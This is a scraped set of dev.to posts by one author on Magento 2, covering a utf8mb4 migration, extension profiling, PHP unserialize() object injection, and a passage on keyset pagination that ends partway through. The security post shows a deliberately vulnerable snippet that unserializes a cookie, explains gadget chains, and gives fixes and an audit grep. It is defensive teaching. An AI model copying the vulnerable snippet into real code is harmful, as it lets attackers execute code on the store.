&lt;h2&gt;
  
  
  The migration looks like one line. It isn't.
&lt;/h2&gt;

&lt;p&gt;The naive version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;customer_entity&lt;/span&gt; &lt;span class="k"&gt;CONVERT&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="nb"&gt;CHARACTER&lt;/span&gt; &lt;span class="k"&gt;SET&lt;/span&gt; &lt;span class="n"&gt;utf8mb4&lt;/span&gt; &lt;span class="k"&gt;COLLATE&lt;/span&gt; &lt;span class="n"&gt;utf8mb4_unicode_ci&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run that across a real Magento schema and you hit this fast:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ERROR 1071 (42000): Specified key was too long; max key length is 767 bytes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An index on a &lt;code&gt;VARCHAR&lt;/code&gt; column is sized in bytes, and MySQL budgets for the widest possible character. Under &lt;code&gt;utf8mb3&lt;/code&gt;, &lt;code&gt;VARCHAR(255)&lt;/code&gt; costs 255 x 3 = 765 bytes, just under the old 767-byte limit. Under &lt;code&gt;utf8mb4&lt;/code&gt; the same column wants 255 x 4 = 1020 bytes, and the index is rejected.&lt;/p&gt;

&lt;p&gt;Two ways out, and which one you need depends on your MySQL version:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MySQL 5.7 with &lt;code&gt;innodb_large_prefix&lt;/code&gt; enabled, or MySQL 8.0&lt;/strong&gt; (where it is the default): the index limit is 3072 bytes on &lt;code&gt;DYNAMIC&lt;/code&gt; or &lt;code&gt;COMPRESSED&lt;/code&gt; row format. Most columns just work. This is where you want to be.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Older or misconfigured servers&lt;/strong&gt; still capped at 767 bytes: indexed string columns have to drop to 191 characters (191 x 4 = 764 bytes) or index a prefix. 191 isn't magic, it is just the largest count that still fits.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Check the row format before you start:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SHOW&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;STATUS&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;Name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'customer_entity'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The column is only half of it
&lt;/h2&gt;

&lt;p&gt;Converting the column does nothing if the application still talks to the database as &lt;code&gt;utf8mb3&lt;/code&gt;. Character set is negotiated on the connection. If the client opens with &lt;code&gt;SET NAMES utf8&lt;/code&gt;, a four-byte character is mangled in transit before it ever reaches your new &lt;code&gt;utf8mb4&lt;/code&gt; column.&lt;/p&gt;

&lt;p&gt;So the migration is three coordinated changes, not one:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Database and tables: &lt;code&gt;ALTER ... CONVERT TO CHARACTER SET utf8mb4&lt;/code&gt;. &lt;code&gt;CONVERT TO&lt;/code&gt; rewrites the table and converts existing data, not just the default for new rows.&lt;/li&gt;
&lt;li&gt;Server defaults in &lt;code&gt;my.cnf&lt;/code&gt; (&lt;code&gt;character-set-server&lt;/code&gt;, &lt;code&gt;collation-server&lt;/code&gt;), so new tables are born correct.&lt;/li&gt;
&lt;li&gt;The application connection charset, so reads and writes negotiate &lt;code&gt;utf8mb4&lt;/code&gt; end to end.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Miss the third and you will swear the migration worked from the &lt;code&gt;mysql&lt;/code&gt; CLI while the storefront keeps corrupting data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two things that bite mid-migration
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;CONVERT TO&lt;/code&gt; is a full table rewrite.&lt;/strong&gt; On a large &lt;code&gt;sales_order&lt;/code&gt; or &lt;code&gt;catalog_product_entity_varchar&lt;/code&gt; table that means a long lock. Do it in a maintenance window, or run it through &lt;code&gt;pt-online-schema-change&lt;/code&gt; or &lt;code&gt;gh-ost&lt;/code&gt; so the table stays writable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Collations have to match across joins.&lt;/strong&gt; Convert some tables and not others and the next query that joins them throws &lt;code&gt;Illegal mix of collations&lt;/code&gt;. Pick one collation, apply it everywhere, and don't leave half the schema on the server default. &lt;code&gt;utf8mb4_unicode_ci&lt;/code&gt; is a safe, widely compatible choice.&lt;/p&gt;

&lt;h2&gt;
  
  
  The lesson isn't really about Magento
&lt;/h2&gt;

&lt;p&gt;This is a MySQL story, not a Magento one. Any application sitting on &lt;code&gt;utf8mb3&lt;/code&gt; carries the same latent bug and the same three-part fix. Magento just surfaces it early, because catalogs and customer data are full of exactly the international text and emoji that four bytes were invented for.&lt;/p&gt;

&lt;p&gt;If you are still on &lt;code&gt;utf8&lt;/code&gt;, you don't have a Unicode-safe store. You have one that hasn't met the wrong character yet.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>mysql</category>
      <category>php</category>
    </item>
    <item>
      <title>Which Magento extension is slowing you down? Stop guessing.</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Wed, 17 Jun 2026 13:18:10 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/which-magento-extension-is-slowing-you-down-stop-guessing-1mj3</link>
      <guid>https://dev.to/iamrobindhiman/which-magento-extension-is-slowing-you-down-stop-guessing-1mj3</guid>
      <description>&lt;p&gt;A store feels slow. Someone has installed forty extensions over three years. The usual advice is "disable them one at a time and see what helps." That is not debugging. That is guessing with extra steps, on production, with a fingers-crossed deploy at the end.&lt;/p&gt;

&lt;p&gt;You can do better. Magento 2 makes the cost of an extension measurable if you know where it spends your time. Here is how I find the culprit instead of guessing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where an extension actually costs you
&lt;/h2&gt;

&lt;p&gt;A third-party module doesn't just "add features." On every request it can add work in four places:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Plugins (interceptors).&lt;/strong&gt; Every &lt;code&gt;&amp;lt;plugin&amp;gt;&lt;/code&gt; in a module's &lt;code&gt;di.xml&lt;/code&gt; wraps a method. Magento compiles these into interceptor classes, and at runtime each one is a layer the call passes through: before, around, after. A module with twenty plugins on hot paths is twenty extra layers on requests that fire constantly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observers.&lt;/strong&gt; Each &lt;code&gt;&amp;lt;observer&amp;gt;&lt;/code&gt; in &lt;code&gt;events.xml&lt;/code&gt; runs when its event dispatches. Subscribe to something like &lt;code&gt;controller_action_predispatch&lt;/code&gt; and your code runs on every single page.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout.&lt;/strong&gt; Layout XML is merged on page render. Blocks that a module injects into shared containers run their templates whether or not anyone looks at them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Queries.&lt;/strong&gt; The quiet one. A block or observer that does "just one more lookup" per item turns into N more queries on a category page.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of these are evil. They are how Magento is meant to be extended. The problem is volume and placement. Twenty cheap things on a page that renders a million times a day is not cheap.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 1: turn on the profiler
&lt;/h2&gt;

&lt;p&gt;Magento ships with a built-in profiler. Enable it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bin/magento dev:profiler:enable
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Set the output you want (the &lt;code&gt;html&lt;/code&gt; profiler is the readable one) and load a slow page. You get a timing tree of the request: which methods ran, how long they took, how many times they were called. The "called N times" column is where extension problems hide. A method that runs once is fine; the same method at 1,400 calls is a loop someone didn't notice.&lt;/p&gt;

&lt;p&gt;For anything serious, reach for a real profiler. Blackfire or Xdebug locally, New Relic or another APM in production. Blackfire in particular gives you a call graph where you can see time attributed to a vendor namespace at a glance. That namespace is your answer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 2: count what's actually attached
&lt;/h2&gt;

&lt;p&gt;Before you profile, it helps to know what each module wires up. No tool needed. Just &lt;code&gt;grep&lt;/code&gt; the vendor tree:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# plugins declared across all modules&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rl&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;plugin"&lt;/span&gt; vendor/&lt;span class="k"&gt;*&lt;/span&gt;/module-&lt;span class="k"&gt;*&lt;/span&gt;/etc/ app/code/&lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;/etc/

&lt;span class="c"&gt;# observers&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rl&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;observer"&lt;/span&gt; vendor/&lt;span class="k"&gt;*&lt;/span&gt;/module-&lt;span class="k"&gt;*&lt;/span&gt;/etc/ app/code/&lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;/etc/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then read the offenders. A plugin on a repository's &lt;code&gt;save&lt;/code&gt; is usually fine. A plugin &lt;code&gt;around&lt;/code&gt; a method on &lt;code&gt;Magento\Framework\View\Element\Template&lt;/code&gt; or on the product collection load is a flag. Those paths run constantly, and an &lt;code&gt;around&lt;/code&gt; plugin that forgets to call &lt;code&gt;$proceed()&lt;/code&gt; correctly can quietly break or slow the whole chain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 3: confirm with a controlled measurement
&lt;/h2&gt;

&lt;p&gt;Now you measure, not guess. Pick one suspect module. With the profiler on, capture the timing of a representative page. Disable that one module (&lt;code&gt;bin/magento module:disable&lt;/code&gt;, recompile, cache flush), capture the same page again. The delta is that module's real cost on that page: attributable, repeatable, defensible.&lt;/p&gt;

&lt;p&gt;This is still "disable a module," but it is the opposite of the shotgun approach: you disable the one the data pointed at, you measure both sides, and you can put a number on the result instead of a vibe.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do with the answer
&lt;/h2&gt;

&lt;p&gt;Once you know which module and which mechanism, you usually have three options, in order of preference:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Configure it out of the hot path.&lt;/strong&gt; Many modules attach to broad events or all pages when they only need one. A setting, or a small di.xml override scoping their plugin to the right area, fixes it without touching their code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replace the mechanism.&lt;/strong&gt; An &lt;code&gt;around&lt;/code&gt; plugin doing work that a &lt;code&gt;before&lt;/code&gt; or &lt;code&gt;after&lt;/code&gt; could do, or an observer that should have been a plugin, can often be reworked in a thin module of your own.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drop it.&lt;/strong&gt; If a module costs more than the feature is worth, and once you've measured you can actually make that call, remove it.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  The point
&lt;/h2&gt;

&lt;p&gt;"It got slow after we added extensions" is true on almost every long-lived Magento store. The mistake is treating the fix as folklore. The cost of every plugin, observer, layout handle, and query is observable. Turn on the profiler, read what's attached, measure one module at a time, and you trade a week of guessing for an afternoon of evidence.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>performance</category>
      <category>php</category>
    </item>
    <item>
      <title>unserialize() is the Magento footgun nobody audits</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 15 Jun 2026 08:13:03 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/unserialize-is-the-magento-footgun-nobody-audits-b5i</link>
      <guid>https://dev.to/iamrobindhiman/unserialize-is-the-magento-footgun-nobody-audits-b5i</guid>
      <description>&lt;p&gt;Every few months the same Magento story runs again: a store is compromised, and it wasn't core. It was a third-party extension — usually something installed for &lt;em&gt;speed&lt;/em&gt;, like a full-page-cache warmer or an import tool. The root cause underneath most of them is the same one PHP developers have been shipping by accident for fifteen years: object injection through &lt;code&gt;unserialize()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It's worth understanding properly, because once you see the shape of it you'll spot it in code review in about three seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  How a string becomes a shell
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;unserialize()&lt;/code&gt; doesn't just rebuild arrays and strings. It rebuilds &lt;em&gt;objects&lt;/em&gt; — it will instantiate any class the calling code has access to and populate its properties, straight from the input string. If an attacker controls that string, they control which objects come into existence and what's inside them.&lt;/p&gt;

&lt;p&gt;On its own, a stray object is harmless. The danger is PHP's magic methods. When an object is destroyed, &lt;code&gt;__destruct()&lt;/code&gt; runs. When it wakes from unserialisation, &lt;code&gt;__wakeup()&lt;/code&gt; runs. In a codebase the size of Magento — core plus framework plus thirty extensions plus their dependencies — there is almost always &lt;em&gt;some&lt;/em&gt; class whose &lt;code&gt;__destruct()&lt;/code&gt; writes a file, or whose &lt;code&gt;__wakeup()&lt;/code&gt; opens a connection, or that can be chained into something that does. Attackers call these gadget chains. They don't need your code to be careless; they need your code to be &lt;em&gt;large&lt;/em&gt;, and to call &lt;code&gt;unserialize()&lt;/code&gt; on something they can reach.&lt;/p&gt;

&lt;p&gt;So the whole exploit reduces to one question: is there a path where untrusted input — a cookie, a request parameter, a cache key, an imported file — reaches an &lt;code&gt;unserialize()&lt;/code&gt; call?&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Magento extensions are fertile ground
&lt;/h2&gt;

&lt;p&gt;Two reasons. First, history: Magento leaned on PHP serialization for years — cache entries, config, sessions — so reaching for &lt;code&gt;serialize()&lt;/code&gt;/&lt;code&gt;unserialize()&lt;/code&gt; is muscle memory for a lot of extension developers. Second, the install base: performance and cache extensions, by their nature, read and write serialized blobs constantly, and they run early in the request before much validation has happened. That's exactly the combination you don't want around a deserialization call.&lt;/p&gt;

&lt;p&gt;A minimal version of the bug looks this innocent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Don't do this.&lt;/span&gt;
&lt;span class="nv"&gt;$payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$request&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getCookie&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'warmer_state'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$state&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;unserialize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;// attacker controls $payload&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No exotic mistake. Just &lt;code&gt;unserialize()&lt;/code&gt; pointed at something a visitor can set.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix is boring, which is the point
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Don't serialize untrusted data with PHP's serializer at all.&lt;/strong&gt; Use JSON. It only carries data — arrays, strings, numbers — never objects, so there are no magic methods to trigger:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;json_decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In Magento 2 specifically, that's exactly what &lt;code&gt;Magento\Framework\Serialize\Serializer\Json&lt;/code&gt; is for. Inject &lt;code&gt;SerializerInterface&lt;/code&gt; and let it do the work — Magento deprecated raw &lt;code&gt;serialize()&lt;/code&gt;/&lt;code&gt;unserialize()&lt;/code&gt; in core for this reason years ago.&lt;/p&gt;

&lt;p&gt;If you genuinely must unserialize PHP-native data, PHP 7+ lets you slam the door on objects:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;unserialize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'allowed_classes'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That turns any embedded object into a &lt;code&gt;__PHP_Incomplete_Class&lt;/code&gt; instead of instantiating it — no gadget chain, no &lt;code&gt;__destruct()&lt;/code&gt; surprise. And if the payload crosses a trust boundary, sign it (HMAC) and verify before you even look at it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Auditing your own store
&lt;/h2&gt;

&lt;p&gt;You can find most of this yourself in a minute:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"unserialize("&lt;/span&gt; vendor/ app/code/ &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; &lt;span class="s2"&gt;"allowed_classes"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Read every hit. For each one, ask the only question that matters: &lt;em&gt;can a user influence what reaches this call?&lt;/em&gt; Start with extensions that touch caching, sessions, import/export, and anything that reads cookies — that's where the live ones hide.&lt;/p&gt;

&lt;h2&gt;
  
  
  The wider point
&lt;/h2&gt;

&lt;p&gt;None of this is really Magento's fault, and none of it is new. PHP object injection is a whole vulnerability class; Java has its own deserialization nightmare, Python has pickle, Ruby has its Marshal bugs. The lesson generalises cleanly: &lt;strong&gt;deserialising attacker-controlled data into rich objects is remote code execution waiting for a gadget.&lt;/strong&gt; Treat any &lt;code&gt;unserialize()&lt;/code&gt; (or &lt;code&gt;pickle.loads&lt;/code&gt;, or &lt;code&gt;readObject&lt;/code&gt;) on untrusted input as a live wire.&lt;/p&gt;

&lt;p&gt;For Magento specifically, the uncomfortable part is that the dangerous code usually isn't yours. It rides in on an extension you installed to make the store &lt;em&gt;faster&lt;/em&gt;. Your perfectly tuned cache layer is worth nothing if it hands an attacker a shell — so the next time you &lt;code&gt;composer require&lt;/code&gt; a performance module, grep it before you trust it.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>security</category>
    </item>
    <item>
      <title>Paginating Magento catalogs without OFFSET</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 15 Jun 2026 08:13:00 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/paginating-magento-catalogs-without-offset-73d</link>
      <guid>https://dev.to/iamrobindhiman/paginating-magento-catalogs-without-offset-73d</guid>
      <description>&lt;p&gt;I was building a module that reads every product in a Magento catalog to generate an &lt;a href="https://llmstxt.org/" rel="noopener noreferrer"&gt;llms.txt&lt;/a&gt; file. On a store with 70,000 products, the standard Magento collection was fast at page 1 and unusably slow around page 40. The code did not change — only the page number.&lt;/p&gt;

&lt;p&gt;This is not specific to Magento. OFFSET pagination gets slower with page depth in every SQL database, and any ORM that exposes &lt;code&gt;LIMIT offset, n&lt;/code&gt; inherits the same curve — Laravel, Django, Rails, Hibernate, all of them. &lt;code&gt;setPageSize()&lt;/code&gt; and &lt;code&gt;setCurPage()&lt;/code&gt; are the standard Magento 2 way to iterate a collection, so the pattern shows up a lot in Magento code. This post is about the fix.&lt;/p&gt;

&lt;h2&gt;
  
  
  The standard way, and why it breaks
&lt;/h2&gt;

&lt;p&gt;In Magento 2, if you want to read every product, you usually write something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$collection&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;collectionFactory&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;addAttributeToSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'*'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setPageSize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setCurPage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$page&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Under the hood, &lt;code&gt;setPageSize&lt;/code&gt; and &lt;code&gt;setCurPage&lt;/code&gt; turn into SQL &lt;code&gt;LIMIT&lt;/code&gt; and &lt;code&gt;OFFSET&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;ASC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt; &lt;span class="k"&gt;OFFSET&lt;/span&gt; &lt;span class="mi"&gt;999000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;MySQL reads this as: "start from row 1, skip 999,000 rows, then give me the next 1,000." The database has no shortcut. It walks the index from the start every single time.&lt;/p&gt;

&lt;p&gt;That is the slowdown. At page 1, &lt;code&gt;OFFSET 0&lt;/code&gt; is free. At page 1000, &lt;code&gt;OFFSET 999000&lt;/code&gt; is 999,000 wasted row reads &lt;em&gt;per request&lt;/em&gt;. The cost grows with the page number — and adds up if the same query runs many times.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix, part one: keyset pagination
&lt;/h2&gt;

&lt;p&gt;Instead of using OFFSET, use the index you already have — the primary key — as a cursor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;lastId&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;ASC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This tells MySQL: "start from the row right after the last one I saw, and give me the next 1,000." It is an index range scan — the database jumps straight to the right spot through the B-tree. The cost is the same whether &lt;code&gt;:lastId&lt;/code&gt; is 0, 10,000, or 1,000,000.&lt;/p&gt;

&lt;p&gt;You pass the last &lt;code&gt;entity_id&lt;/code&gt; you saw into the next query as &lt;code&gt;:lastId&lt;/code&gt;. The cursor moves forward through the table without ever skipping rows.&lt;/p&gt;

&lt;p&gt;Other teams have written about large speedups from this switch on production tables. The point is not the exact number — it is that the cost no longer grows with page depth.&lt;/p&gt;

&lt;p&gt;Here is what it looks like in the module:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;buildProductSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;Select&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$select&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;select&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'catalog_product_entity'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;where&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'entity_id &amp;gt; ?'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;order&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'entity_id ASC'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;limit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// ... EAV joins, status filter, visibility filter, etc.&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$select&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;WHERE entity_id &amp;gt; :lastId&lt;/code&gt; is the whole trick. Everything else is standard Magento code.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix, part two: PHP generators
&lt;/h2&gt;

&lt;p&gt;Keyset pagination solves the database side. But if you load 70,000 products into PHP arrays in one go, you have only moved the problem.&lt;/p&gt;

